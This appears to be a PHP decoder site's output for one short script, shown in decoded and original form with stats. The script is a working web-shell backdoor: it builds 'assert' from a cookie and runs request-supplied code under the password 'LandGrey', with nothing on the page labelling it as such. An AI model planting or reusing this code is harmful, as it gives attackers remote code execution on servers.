Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Noticed: (PHP 5 >= 5.4.0, PHP 7) * */ $password = "LandGrey"; $ch = ..

Decoded Output download

<?php 
/** 
 *  Noticed: (PHP 5 >= 5.4.0, PHP 7) 
 * 
 */ 
$password = "LandGrey"; 
$ch = $_COOKIE["set-domain-name"]; 
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch."ert"); 
?>

Did this file decode correctly?

Original Code

<?php
/**
 *  Noticed: (PHP 5 >= 5.4.0, PHP 7)
 *
 */
$password = "LandGrey";
$ch = $_COOKIE["set-domain-name"];
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch."ert");
?>

Function Calls

array_intersect_ukey 1

Variables

$ch None
$password LandGrey

Stats

MD5 4ac83d161533d8e9c3b7501b022a08fc
Eval Count 0
Decode Time 113 ms